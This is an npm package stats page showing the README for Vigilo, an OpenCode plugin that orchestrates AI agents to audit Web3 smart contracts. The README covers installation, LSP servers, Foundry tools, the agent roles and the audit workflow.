npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

vigilo

v1.0.2

Published

Vigilo - Web3 Smart Contract Security Auditing Orchestrator for OpenCode

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

catower917catower917

Keywords

opencodepluginweb3smart-contractsecurityauditsolidityvypercairofoundryhardhat

Readme

Vigilo

Web3 Smart Contract Security Auditing Orchestrator - OpenCode Plugin

An autonomous security legion for smart contract auditing, built as an OpenCode plugin. From Latin vigilo — "I watch, I guard." Inspired by the command structure of the Roman army, Vigilo deploys specialized agents to find vulnerabilities before attackers do.

Features

  • Automated Audit Workflow: Scope resolution → Recon → Deep Analysis → PoC → Report
  • Specialized Auditors: Protocol-specific vulnerability detection
  • Multi-Language Support: Solidity, Vyper, Cairo, Rust, Go
  • LSP Integration: Language server support for smart contract languages
  • Foundry Integration: Built-in tools for forge build/test/coverage
  • Parallel Analysis: Spawn multiple auditors (max 3) for comprehensive coverage
  • PoC Validation: Generate and validate Foundry tests

Supported Languages

| Language | Extensions | LSP Server | Use Case | |----------|------------|------------|----------| | Solidity | .sol | @nomicfoundation/solidity-language-server | EVM chains | | Vyper | .vy | vyper-lsp | Python-like EVM contracts | | Cairo | .cairo | cairo-language-server (Scarb) | Starknet/StarkEx | | Rust | .rs | rust-analyzer | Solana, NEAR, Substrate | | Go | .go | gopls | Cosmos SDK |

Installation

Prerequisites

Install Plugin

bunx vigilo install

Or manually:

git clone https://github.com/PurpleAILAB/Vigilo.git vigilo
cd vigilo
bun install
bun run build

Install LSP Servers (Optional)

# Solidity (recommended)
npm install -g @nomicfoundation/solidity-language-server

# Vyper
pipx install vyper-lsp

# Cairo (via Scarb)
curl https://get.swmansion.com | bash && starkup

# Rust (already included in rustup)
rustup component add rust-analyzer

# Go
go install golang.org/x/tools/gopls@latest

Usage

Commands

| Command | Description | |---------|-------------| | /audit | Start full security audit workflow | | /poc <finding.md> | Generate and validate PoC for a finding |

Example

# Start OpenCode in your project
cd my-solidity-project
opencode

# Run full audit
/audit

# Generate PoC for a finding
/poc .vigilo/findings/high/H-01-reentrancy.md

Audit Workflow

Phase 0        Phase 1           Phase 2          Phase 3    Phase 4
(scope)        (recon)           (audit)          (PoC)      (report)
   │              │                  │               │           │
   ▼              ▼                  ▼               ▼           ▼
 scope.txt ─→ explorator ─────┐
              speculator ─────┼─→ recon/*.md ─→ centuriones ──→ findings/ ─→ PoC ─→ report
                              │                (max 3 parallel)
                              └─ protocol type detected

Available Tools

Foundry Tools

| Tool | Description | |------|-------------| | forge_build | Compile Solidity contracts | | forge_test | Run tests with configurable verbosity | | forge_coverage | Generate code coverage | | cast_call | Query contract state |

Agent Tools

| Tool | Description | |------|-------------| | delegate_task | Spawn specialized auditors | | background_output | Get background audit results | | background_cancel | Cancel running audits | | background_list | List all audit tasks | | skill | Load specialized audit skills |

Reconnaissance Agents (Exploratores & Speculatores)

| Agent | Latin Role | Focus | |-------|-----------|-------| | explorator | Scout (Exploratores) | Code structure, execution flows, asset locations, protocol type | | speculator | Intelligence (Speculatores) | Protocol design, invariants, trust assumptions from documentation |

Specialized Auditors (Centuriones)

| Auditor | Focus | |---------|-------| | reentrancy-auditor | CEI violations, cross-function/contract reentrancy | | oracle-auditor | Oracle manipulation, price feed attacks | | access-control-auditor | Permission vulnerabilities | | logic-auditor | Business logic errors | | flashloan-auditor | Flash loan attack vectors | | defi-auditor | DeFi-specific vulnerabilities | | cross-chain-auditor | Bridge and cross-chain vulnerabilities | | token-auditor | ERC20/721/1155 implementation issues |

Directory Structure

.vigilo/
├── recon/           # Explorator & Speculator outputs
├── findings/        # Vulnerability findings
│   ├── high/
│   └── medium/
├── poc/             # PoC validation logs
└── reports/         # Final reports

Configuration

Create .vigilo/config.json in your project:

{
  "disabled_skills": [],
  "disabled_agents": []
}

Environment Variables

| Variable | Description | |----------|-------------| | VIGILO_DEBUG | Enable debug logging | | DEBUG | General debug mode |

License

Business Source License 1.1

  • Non-production use: Free
  • Production use: Requires commercial license
  • Change Date: 2029-01-21 (converts to Apache-2.0)